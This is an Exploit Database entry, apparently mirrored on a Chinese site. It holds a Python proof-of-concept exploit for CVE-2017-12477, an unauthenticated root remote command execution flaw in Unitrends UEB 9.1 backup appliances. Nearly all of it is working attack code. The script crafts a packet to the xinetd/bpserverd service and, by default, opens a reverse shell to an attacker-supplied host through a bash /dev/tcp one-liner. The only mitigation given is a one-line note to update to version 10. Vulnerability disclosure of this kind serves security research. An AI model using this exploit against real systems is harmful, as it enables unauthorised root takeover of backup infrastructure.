Unitrends UEB 9.1 – ‘Unitrends bpserverd’ Remote Command Execution

• Exploit Database
• 135 阅读

• 作者： Jared Arave
  日期： 2017-08-08
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/42957/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168

  # Exploit Title: Unauthenticated root RCE for Unitrends UEB 9.1 # Date: 08/08/2017 # Exploit Authors: Jared Arave, Cale Smith, Benny Husted # Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413 # Vendor Homepage: https://www.unitrends.com/ # Software Link: https://www.unitrends.com/download/enterprise-backup-software # Version: 9.1 # Tested on: CentOS6 # CVE: CVE-2017-12477   import socket import binascii import struct import time import sys from optparse import OptionParser   print """ ############################################################################### Unauthenticated root RCE for Unitrends UEB 9.1 Tested against appliance versions: [+] 9.1.0-2.201611302120.CentOS6   This exploit uses roughly the same process to gain root execution as does the apache user on the Unitrends appliance. The process is something like this:   1.Connect to xinetd process (it&apos;s usually running on port 1743) 2.This process will send something like: &apos;?A,Connect36092&apos; 3.Initiate a second connection to the port specified in the packet from xinetd (36092 in this example) 4.send a specially crafted packet to xinetd, containing the command to be executed as root 5.Receive command output from the connection to port 36092 6.Close both connections   NB: Even if you don&apos;t strictly need output from your command, The second connection must still be made for the command to be executed at all. ############################################################################### """   # Parse command line args: usage = "Usage: %prog -r <appliance_ip> -l <listener_ip> -p <listener_port>\n"\ " %prog -r <appliance_ip> -c &apos;touch /tmp/foooooooooooo&apos;"   parser = OptionParser(usage=usage) parser.add_option("-r", &apos;--RHOST&apos;, dest=&apos;rhost&apos;, action="store", help="Target host w/ UNITRENDS UEB installation") parser.add_option("-l", &apos;--LHOST&apos;, dest=&apos;lhost&apos;, action="store", help="Host listening for reverse shell connection") parser.add_option("-p", &apos;--LPORT&apos;, dest=&apos;lport&apos;, action="store", help="Port on which nc is listening") parser.add_option("-c", &apos;--cmd&apos;, dest=&apos;cmd&apos;, action="store", help="Run a custom command, no reverse shell for you.") parser.add_option("-x", &apos;--xinetd&apos;, dest=&apos;xinetd&apos;, action="store", type="int", default=1743, help="port on which xinetd is running (default: 1743)")   (options, args) = parser.parse_args()   if options.cmd: if (options.lhost or options.lport): parser.error("[!] Options --cmd and [--LHOST||--LPORT] are mutually exclusive.\n")   elif not options.rhost: parser.error("[!] No remote host specified.\n")   elif options.rhost is None or options.lhost is None or options.lport is None: parser.print_help() sys.exit(1)   RHOST = options.rhost LHOST = options.lhost LPORT = options.lport XINETDPORT = options.xinetd   if options.cmd: cmd = options.cmd else: cmd = &apos;bash -i >& /dev/tcp/{0}/{1} 0>&1 &&apos;.format(LHOST, LPORT)   def recv_timeout(the_socket,timeout=2): the_socket.setblocking(0) total_data=[];data=&apos;&apos;;begin=time.time() while 1: #if you got some data, then break after wait sec if total_data and time.time()-begin>timeout: break #if you got no data at all, wait a little longer elif time.time()-begin>timeout*2: break try: data=the_socket.recv(8192) if data: total_data.append(data) begin=time.time() else: time.sleep(0.1) except: pass return &apos;&apos;.join(total_data)   print "[+] attempting to connect to xinetd on {0}:{1}".format(RHOST, str(XINETDPORT))   try: s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s1.connect((RHOST,XINETDPORT)) except: print "[!] Failed to connect!" exit()   data = s1.recv(4096) bpd_port = int(data[-8:-3])   print "[+] Connected! Cmd output will come back on {}:{}".format(RHOST, str(bpd_port)) print "[+] Connecting to bpdserverd on {}:{}".format(RHOST, str(bpd_port))   try: s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s2.connect((RHOST, bpd_port)) except: print "[!] Failed to connect!" s1.close() exit()   print "[+] Connected! Sending the following cmd to {0}:{1}".format(RHOST,str(XINETDPORT)) print "[+] &apos;{0}&apos;".format(cmd)   if (len(cmd) > 240): print "[!] This command is long; this might not work." print "[!] Maybe try a shorter command..."   cmd_len = chr(len(cmd) + 3) packet_len = chr(len(cmd) + 23)   packet = &apos;\xa5\x52\x00\x2d&apos; packet += &apos;\x00&apos; * 3 packet += packet_len packet += &apos;\x00&apos; * 3 packet += &apos;\x01&apos; packet += &apos;\x00&apos; * 3 packet += &apos;\x4c&apos; packet += &apos;\x00&apos; * 3 packet += cmd_len packet += cmd packet += &apos;\x00&apos; * 3   s1.send(packet)   print "[+] cmd packet sent!" print "[+] Waiting for response from {0}:{1}".format(RHOST,str(bpd_port))   data = recv_timeout(s2)   print "[+] Here&apos;s the output -> \n\n"   print data   print "[+] Closing ports, exiting...."   s1.close() s2.close()   # 3. Solution: # Update to Unitrends UEB 10